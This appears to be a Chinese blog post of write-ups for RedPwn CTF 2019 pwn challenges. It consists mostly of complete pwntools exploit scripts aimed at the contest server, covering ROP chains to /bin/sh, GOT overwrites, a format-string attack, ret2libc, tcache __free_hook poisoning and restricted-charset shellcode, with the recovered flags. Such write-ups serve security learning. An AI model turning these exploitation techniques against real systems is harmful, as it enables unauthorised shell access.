avatar
文章
172
标签
51
分类
29
首页
归档
标签
分类
友链
关于
额外功能
咲夜南梦's 博客
首页
归档
标签
分类
友链
关于
额外功能
CTF-RedPwn-19年8月
|CTF
阅读量:|评论数:

Pwn

0x1 BabbyPwn

1
连进去 然后等着,就会出flag

0x2 Bronze Ropchain

存在栈溢出,然后可以考虑使用ROPgadget,并且去除\x00字符和换行符

1
ROPgadget --binary ./bronze_ropchain --badbytes "00|0a" --ropchain
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
#!/usr/bin/env python2
# execve generated by ROPgadget
from pwn import *
from struct import pack
# context.log_level = 'debug'
# Padding goes here
p = ''
p += pack('<I', 0x0806ef2b) # pop edx ; ret
p += pack('<I', 0x080da060) # @ .data
p += pack('<I', 0x080564b4) # pop eax ; pop edx ; pop ebx ; ret
p += '/bin'
p += pack('<I', 0x080da060) # padding without overwrite edx
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x08056fe5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ef2b) # pop edx ; ret
p += pack('<I', 0x080da064) # @ .data + 4
p += pack('<I', 0x080564b4) # pop eax ; pop edx ; pop ebx ; ret
p += '//sh'
p += pack('<I', 0x080da064) # padding without overwrite edx
p += pack('<I', 0x41414141) # padding
p += pack('<I', 0x08056fe5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ef2b) # pop edx ; ret
p += pack('<I', 0x080da068) # @ .data + 8
p += pack('<I', 0x080565a0) # xor eax, eax ; ret
p += pack('<I', 0x08056fe5) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080da060) # @ .data
p += pack('<I', 0x0806ef52) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080da068) # @ .data + 8
p += pack('<I', 0x080da060) # padding without overwrite ebx
p += pack('<I', 0x0806ef2b) # pop edx ; ret
p += pack('<I', 0x080da068) # @ .data + 8
p += pack('<I', 0x080565a0) # xor eax, eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x0807c3ba) # inc eax ; ret
p += pack('<I', 0x080495b3) # int 0x80
payload = 'A'*28 + p
#r = process('bronze_ropchain')
r = remote('chall.2019.redpwn.net',4004)
r.recvuntil('What is your name?\n')
#gdb.attach(r)
r.sendline(payload)
r.sendline('')
r.interactive()

0x3 Bronze Ropchain

yeet里的漏洞可以改变chunk_head的值,然后控制got

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
#!/usr/bin/python2.7  
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = "debug"
context.arch = "i386"
elf = ELF("dennis")
sh = 0
lib = 0
def add(size):
	sh.recvuntil("Command me: ")
	sh.sendline("1")
	sh.recvuntil(":")
	sh.sendline(str(size))
def show(size):
	sh.recvuntil("Command me: ")
	sh.sendline("2")
	sh.recvuntil(":")
	sh.sendline(str(size))
def edit(content):
	sh.recvuntil("me: ")
	sh.sendline("4")
	sh.recvuntil(":")
	sh.sendline(content)	
def free():
	sh.recvuntil("Command me: ")
	sh.sendline("5")
def vul():
	sh.recvuntil("Command me: ")
	sh.sendline("3")
def pwn(ip,port,debug):
	global sh
	global lib
	if(debug == 1):
		sh = process("./dennis")
		lib = ELF("/lib/i386-linux-gnu/libc.so.6")
	else:
		sh = remote(ip,port)
		lib = ELF("libc-2.23.so")
	chunk_head = 0x0804B050
	add(0x8)
	free()
	add(0x8)
	edit(p32(0x0804B004) + p32(chunk_head))
	vul()
	show(0x18)
	free_got = u32(sh.recvuntil("Command",True)[-4:])
	libc = free_got - lib.symbols['free']
	system = libc + lib.symbols['system']
	log.success("free: " + hex(free_got))
	log.success("libc: " + hex(libc))
	log.success("system: " + hex(system))
	payload  = '/bin/sh\x00'
	payload += p32(libc + lib.symbols['setbuf'])
	payload += p32(libc + lib.symbols['printf'])
	payload += p32(libc + lib.symbols['gets'])
	payload += p32(system)
	payload += p32(libc + lib.symbols['fgets'])
	edit(payload)
	free()
	sh.interactive()
if __name__ == "__main__":
	pwn("chall.2019.redpwn.net",4006,0)

0x4 HARDMODE

题目打开直接拿到shell,然后cat flag.txt,很脑洞的是

flag就是下面这一行

1
cat: flag.txt: No such file or directory

0x5 Rot26

简单的格式化字符串漏洞

1
2
3
4
5
6
7
8
9
10
#!/usr/bin/env python
from pwn import *
#p = process('./rot26')
p = remote('chall.2019.redpwn.net',4003)
elf = ELF('./rot26')
shell = 0x8048737
offset = 7
payload = fmtstr_payload(offset, {elf.got['exit']:shell})
p.sendline(payload)
p.interactive()
1
flag{w4it_d03s_r0t26_4ctu4lly_ch4ng3_4nyth1ng?}

0x5 Stop, ROP, n’, Roll

构造%s,然后printf去libc leak,然后就是ret2libc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
#!/usr/bin/python2.7  
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = "debug"
context.arch = "amd64"
elf = ELF("srnr")
sh = 0
lib = 0
def pwn(ip,port,debug):
	global sh
	global lib
	if(debug == 1):
		sh = process("./srnr")
		lib = ELF("/lib/x86_64-linux-gnu/libc.so.6")
	else:
		sh = remote(ip,port)
		lib = ELF("libc.so.6")
	sh.recvuntil('[#] number of bytes: ')
	pop_rdi_ret = 0x400823
	pop_rsi_r15_ret = 0x400821
	offset = 9 + 8
	payload  = offset * 'a'
	payload += p64(pop_rdi_ret)
	payload += p64(0)
	payload += p64(pop_rsi_r15_ret)
	payload += p64(elf.bss() + 0x800) * 2
	payload += p64(elf.plt['read'])
	payload += p64(pop_rdi_ret)
	payload += p64(elf.bss() + 0x800)
	payload += p64(pop_rsi_r15_ret)
	payload += p64(elf.got['__libc_start_main']) * 2
	payload += p64(elf.plt['printf'])
	payload += p64(elf.symbols['_start'])
	sh.sendline("0")
	sleep(2)
	sh.sendline(payload)
	sleep(2)
	sh.sendline("%s")
	__libc_start_main = u64(sh.recvuntil("\x7f",False).ljust(8,'\x00'))
	libc = __libc_start_main - lib.symbols['__libc_start_main']
	system = libc + lib.symbols['system']
	binsh = libc + lib.search("/bin/sh\x00").next()
	sleep(2)
	sh.recvuntil('[#] number of bytes: ')
	sh.sendline("0")

	payload  = offset * 'a'
	payload += p64(pop_rdi_ret)
	payload += p64(binsh)
	payload += p64(system)
	sleep(2)
	sh.sendline(payload)
	log.success("__libc_start_main:" + hex(__libc_start_main))
	sh.interactive()
if __name__ == "__main__":
	pwn("chall.2019.redpwn.net",4008,0)

0x7 penpal world

tcache攻击,然后leak libc,然后覆盖__free_hook为system,然后free("/bin/sh\x00")即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
#!/usr/bin/python2.7  
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = "debug"
context.arch = "amd64"
elf = ELF("penpal_world")
sh = 0
lib = 0
def add(idx):
    sh.recvuntil("Read a postcard")
    sh.sendline("1")
    sh.recvuntil("Which envelope #?")
    sh.sendline(str(idx))
def edit(idx,content):
    sh.recvuntil("Read a postcard")
    sh.sendline("2")
    sh.recvuntil("Which envelope #?")
    sh.sendline(str(idx))
    sh.recvuntil("Write")
    sh.send(content)
def free(idx):
    sh.recvuntil("Read a postcard")
    sh.sendline("3")
    sh.recvuntil("Which envelope #?")
    sh.sendline(str(idx))
def show(idx):
    sh.recvuntil("Read a postcard")
    sh.sendline("4")
    sh.recvuntil("Which envelope #?")
    sh.sendline(str(idx))
def pwn(ip,port,debug):
    global sh
    global lib
    if(debug == 1):
        sh = process("./penpal_world")
        lib = ELF("/lib/x86_64-linux-gnu/libc.so.6")
    else:
        sh = remote(ip,port)
        lib = ELF("libc-2.27.so")
    add(0)
    add(1)
    add(1)
    add(1)
    free(1)
    free(1)
    show(1)
    heap_base = u64(sh.recvuntil("\x0a\x4f\x50",True).ljust(8,'\x00')) >> 8
    heap_base = heap_base - 0x350
    edit(1,p64(heap_base + 0x250))
    add(1)
    add(1)
    edit(1,p64(0) + p64(0xa1))
    for i in range(7):
        free(0)
    free(0)
    show(0)
    main_arena = (u64(sh.recvuntil("\x7f",False).ljust(8,'\x00')) >> 8) - 96
    libc = main_arena - 0x10 - lib.symbols['__malloc_hook']
    __free_hook = libc + lib.symbols['__free_hook']
    system = libc + lib.symbols['system']

    add(1)
    free(1)
    edit(1,p64(__free_hook))
    add(1)
    add(1)
    edit(1,p64(system))
    add(1)
    edit(1,'/bin/sh\x00')
    free(1)
    log.success("system: " + hex(system))
    log.success("main_arena: " + hex(main_arena))
    log.success("libc: " + hex(libc))
    log.success("heap_base: " + hex(heap_base))
    if debug == 1:
        log.success("pid = " + str(sh.pid))

    sh.interactive()
if __name__ == "__main__":
    pwn("chall.2019.redpwn.net",4010,0)
1
flag{0h_n0e5_sW1p3r_d1D_5w!peEEeE}

0x8 knuth

典型的shellcode,但是加了限制条件,必须是0x20到0x7f之间或者0x0a

可以通过栈迁移,构造超出限制的shellcode

但是需要一些数学运算

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
#!/usr/bin/python2.7  
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = "debug"
context.arch = "i386"
elf = ELF("knuth")
sh = 0
lib = 0
def pwn(ip,port,debug):
	global sh
	global lib
	if(debug == 1):
		sh = process("./knuth")
		
	else:
		sh = remote(ip,port)
	call_eax = 0x08048692
	payload = asm('push eax')
	payload += asm('pop eax')
	payload = payload * 16
	payload += asm("push ecx")
	payload += asm('push ecx')
	payload += asm("pop edx")
	payload += asm("push 0x68732f2f")
	payload += asm('push 0x6e69622f')
	payload += asm('push esp')
	payload += asm('pop ebx')
	payload += asm('push ecx')*2
	payload += asm('push eax')
	payload += asm('pop edi')
	payload += asm("or al,[eax+0x23]")
	payload += asm('push eax')
	payload += asm('push edi')
	payload += asm('pop eax')
	payload += asm('xor ax,[eax+0x69]')
	payload += asm('xor al,[eax+0x69]')
	payload = payload .ljust(0x4f,'\x40')
	payload += asm('or al,[edi+0x71]')
	payload += asm('pop esp')
	payload += asm('push eax')
	payload += asm('pop esi')
	payload += asm('pop eax')
	payload += asm('push ecx')
	payload += asm('pop eax')
	payload += asm('inc eax') * 0xa
	payload += asm('push ecx')
	payload = payload.ljust(0x70,'\x40')
	payload += '\x7e\x4D'
	sh.sendline(payload)
	sh.interactive()
if __name__ == "__main__":
	pwn("chall.2019.redpwn.net",4009,0)
1
flag{ok so basically, this is a flag-~-urfnatoufnruiantoeakolfhepicqniuwnfkteoikcoyuqnouqnwfounoakfentou}
文章作者: 咲夜南梦
文章链接: http://yoursite.com/2019/08/13/CTF-RedPwn-19%E5%B9%B48%E6%9C%88/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 咲夜南梦's 博客
CTF
打赏
  • 微信
    微信
  • 支付宝
    支付宝
相关推荐
2020-04-30
ARM-常用汇编
2018-11-09
密码学-Blowfish加密算法
2020-04-22
C-Socket编程
2019-08-30
CTF-19年OPPO_OGeek_线上赛
2019-08-30
CTF-19年第五空间网络安全大赛线上赛
2019-08-26
CTF-19年网络与信息安全领域专项赛
评论